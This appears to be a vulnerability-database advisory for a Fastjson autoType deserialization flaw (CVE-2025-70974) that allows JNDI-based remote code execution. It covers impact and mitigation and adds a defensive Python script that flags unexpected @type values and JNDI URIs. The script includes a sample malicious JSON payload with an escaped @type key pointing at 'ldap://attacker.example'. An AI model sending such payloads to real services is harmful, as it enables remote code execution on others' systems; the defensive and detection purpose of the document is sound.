
CVE-2025-70974: CWE-829 Inclusion of Functionality from Untrusted Control Sphere in Alibaba Fastjson

Severity: Critical
Published: Fri Jan 09 2026 (01/09/2026, 06:43:23 UTC)
Source: CVE Database V5
Vendor/Project: Alibaba
Product: Fastjson

Description

CVE-2025-70974 is a critical remote code execution vulnerability in Alibaba's Fastjson library, affecting versions before 1.2.48. It arises from improper handling of the @type key in JSON documents: the key tells Fastjson which Java class to instantiate, and vulnerable versions let an attacker name arbitrary classes whose setters and getters are then invoked during deserialization, which can be turned into JNDI injection. The flaw is the result of an incomplete fix for an earlier issue (CVE-2017-18349) and is related to a later bypass (CVE-2022-25845). It requires no authentication or user interaction, is exploitable remotely over the network, and affects confidentiality, integrity, and availability. European organizations running vulnerable Fastjson versions in their Java applications are at high risk of compromise, and patching or upgrading to a fixed version should be treated as urgent. Countries with heavy Java use in finance, government, and critical infrastructure are the most likely targets.

AI-Powered Analysis

Last updated: 01/16/2026, 09:56:25 UTC

Technical Analysis

CVE-2025-70974 is a critical vulnerability in Alibaba's Fastjson library, a widely used Java JSON parser and serializer. The flaw stems from Fastjson's handling of the @type key, which a JSON document can use to name the Java class Fastjson should instantiate during deserialization (the autoType feature). The class restrictions introduced after CVE-2017-18349 could be bypassed in versions prior to 1.2.48, so an attacker who controls the input can still have classes of their choosing instantiated. Fastjson populates such an object by calling its setters (and, for some types, getters), so a class whose setter performs a JNDI lookup lets the attacker embed a JNDI reference elsewhere in the same document; the application then fetches and executes attacker-controlled code from an LDAP or other JNDI-backed service. The vulnerability is a direct consequence of the incomplete remediation of CVE-2017-18349 and is related to CVE-2022-25845, a later autoType bypass. The CVSS v3.1 score of 10.0 reflects the network attack vector, the absence of any authentication or user-interaction requirement, and the severe impact on confidentiality, integrity, and availability. Successful exploitation yields code execution inside the application's JVM and can lead to full system compromise, data theft, or service disruption. No exploitation in the wild was reported at the time of publication, but the criticality and the history of exploitation of similar Fastjson flaws warrant immediate attention. Every application that parses untrusted JSON with a vulnerable Fastjson version is affected, web services and APIs above all.

Potential Impact

For European organizations, the impact of CVE-2025-70974 is severe. Exploitation can lead to remote code execution, allowing attackers to take full control of affected systems, steal sensitive data, disrupt services, or move laterally within networks. Industries with heavy reliance on Java applications and Fastjson, such as banking, telecommunications, healthcare, and government, face heightened risks. Compromise of critical infrastructure or sensitive personal data could result in regulatory penalties under GDPR and damage to reputation. The vulnerability's network accessibility and lack of authentication requirements increase the likelihood of automated exploitation attempts. Additionally, the widespread use of Fastjson in enterprise software and cloud services across Europe amplifies the potential attack surface. Organizations may also face challenges in detection and response due to the subtlety of deserialization attacks and the complexity of Java environments.

Mitigation Recommendations

European organizations should immediately identify every instance of Fastjson in their environments, including transitive dependencies pulled in by third-party software, and upgrade to Fastjson 1.2.48 or later, where this bypass is fixed. Note that 1.2.48 closes only this issue: the related CVE-2022-25845 affected releases before 1.2.83, so upgrade to a current release rather than stopping at 1.2.48. If upgrading is not immediately feasible, treat configuration as a stopgap only. The repeated bypasses of Fastjson's autoType checks show that a denylist of known gadget classes cannot be relied on; where typed deserialization is genuinely needed, restrict it to an explicit allowlist of application classes through Fastjson's accept list, and otherwise keep autoType disabled. Releases from 1.2.68 onward also provide a safeMode switch that turns autoType off entirely, which is the setting to adopt once the upgrade is done. Web application firewalls can be configured to flag JSON payloads containing @type keys that name unexpected classes, but they must inspect the decoded JSON rather than the raw bytes: the key can be written with JSON escapes (for example \u0040type) that a literal pattern will not match. Logging and monitoring of deserialization activity, and of outbound LDAP or other JNDI connections from application servers, help detect exploitation attempts. Security teams should conduct code reviews and penetration tests focused on deserialization, ensure incident response plans cover deserialization and JNDI injection scenarios, and coordinate with vendors so that third-party applications are patched promptly.
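The @type mechanism described under Technical Analysis and the allowlist, WAF and version-tracking advice above can be exercised with a small audit script. This is an added example and not code from the advisory or from the Fastjson project; the class allowlist, the sample payloads, the hypothetical class names and the version strings are constructed for illustration, and the set of JNDI URI schemes flagged is an assumption about what the application legitimately carries in JSON.

```python
"""Audit helpers for Fastjson-style JSON payloads and dependency versions.

Added example for this advisory, not code from the advisory or from the
Fastjson project. The allowlist, sample payloads and version strings are
constructed for illustration.
"""
import json
import re
from typing import Iterator, List, Optional, Tuple

# Release in which the advisory says this bypass is fixed.
FIXED_VERSION = (1, 2, 48)

# JNDI URI schemes to flag in string values. ldap/ldaps are the ones the
# advisory discusses; rmi and iiop are other JNDI providers. Assumption:
# the application has no legitimate reason to carry such URIs in JSON.
JNDI_SCHEME_RE = re.compile(r"^(ldap|ldaps|rmi|iiop)://", re.IGNORECASE)

# Classes that @type may legitimately name. Hypothetical names; replace
# with the handful of DTOs your application actually deserialises by type.
ALLOWED_TYPES = {"com.example.api.Order", "com.example.api.LineItem"}


def parse_fastjson_version(version: str) -> Tuple[int, int, int]:
    """Turn '1.2.47' or '1.2.24.sec01' into a comparable (major, minor, patch).

    Trailing non-numeric components (vendor security suffixes) are ignored,
    so comparison is on the numeric prefix only (assumption).
    """
    parts: List[int] = []
    for piece in version.strip().split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    if len(parts) < 3:
        raise ValueError(f"unrecognised Fastjson version: {version!r}")
    return parts[0], parts[1], parts[2]


def is_vulnerable_version(version: str) -> bool:
    """True for any release older than the 1.2.48 fix named in the advisory."""
    return parse_fastjson_version(version) < FIXED_VERSION


def walk(node: object, path: str = "$") -> Iterator[Tuple[str, Optional[str], object]]:
    """Depth-first walk yielding (json_path, parent_key, value) for every scalar.

    The whole tree is visited because a malicious @type may sit in any
    nested object, not only at the top level.
    """
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if isinstance(value, (dict, list)):
                yield from walk(value, child)
            else:
                yield child, key, value
    elif isinstance(node, list):
        for i, value in enumerate(node):
            child = f"{path}[{i}]"
            if isinstance(value, (dict, list)):
                yield from walk(value, child)
            else:
                yield child, None, value


def audit_payload(raw: str, allowed=ALLOWED_TYPES) -> List[str]:
    """Return findings for @type values outside the allowlist and JNDI-looking strings.

    Inspection runs on the fully decoded document, so a key written with the
    legal JSON escape "\\u0040type" is still recognised as "@type"; a filter
    matching the literal bytes '@type' on the wire would miss it.
    """
    findings: List[str] = []
    for path, key, value in walk(json.loads(raw)):
        if key == "@type":
            if not isinstance(value, str) or value not in allowed:
                findings.append(f"{path}: @type={value!r} not in allowlist")
        elif isinstance(value, str) and JNDI_SCHEME_RE.match(value):
            findings.append(f"{path}: JNDI-style URI {value!r}")
    return findings


# Constructed sample documents (not captured traffic). The class name in the
# second one is hypothetical and stands in for any unexpected @type target.
BENIGN = (
    '{"@type":"com.example.api.Order","id":7,'
    '"items":[{"@type":"com.example.api.LineItem","sku":"A1"}]}'
)
SUSPICIOUS = (
    '{"a":{"\\u0040type":"com.example.gadget.Lookup",'
    '"target":"ldap://attacker.example:1389/x"},"b":1}'
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, audit_payload(doc) or "no findings")
    for v in ("1.2.47", "1.2.48", "1.2.24.sec01", "1.2.83"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "fixed")
```

Running the script reports the escaped @type key and the ldap:// value in the second document while passing the first, and classifies 1.2.47 and 1.2.24.sec01 as vulnerable. The detector is a monitoring aid for a WAF or log pipeline, not a substitute for the upgrade: it only tells you that someone is trying.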


Technical Details

Data Version
5.2
Assigner Short Name
mitre
Date Reserved
2026-01-09T06:43:23.338Z
CVSS Version
3.1
State
PUBLISHED

Threat ID: 6960a6a3ecefc3cd7c0ce3f6

Added to database: 1/9/2026, 6:56:35 AM

Last enriched: 1/16/2026, 9:56:25 AM

Last updated: 2/21/2026, 3:37:49 AM


